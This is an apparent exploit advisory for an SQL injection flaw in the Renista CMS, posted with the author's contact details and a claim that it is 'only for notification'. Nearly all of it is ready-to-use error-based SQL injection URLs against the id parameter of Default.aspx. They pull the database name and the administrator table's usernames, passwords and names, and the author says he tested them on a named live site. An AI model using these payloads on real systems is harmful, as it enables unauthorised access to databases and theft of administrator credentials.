30 lines
No EOL
1.5 KiB
Text
30 lines
No EOL
1.5 KiB
Text
Author:Amir Afghanian
|
|
Discovered by :Amir Afghanian
|
|
My Email: Www.hack.net@gmail.com
|
|
my Y!ID: Amir_Coder
|
|
My Home page : www.shabgard.org
|
|
My Nice name : TakFanar
|
|
============
|
|
Renista CMS BUG
|
|
Only For NOTIFICATION
|
|
==================
|
|
Test on CMS Owner site :http://www.rayaco.com
|
|
|
|
# db name :
|
|
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,db_name())--
|
|
|
|
# cont user :
|
|
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--
|
|
|
|
# username :
|
|
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
|
|
|
|
# password :
|
|
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
|
|
# name :
|
|
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
|
|
========================
|
|
I tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .
|
|
|
|
Special thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...
|
|
Contact me : www.hack.net@gmail.com |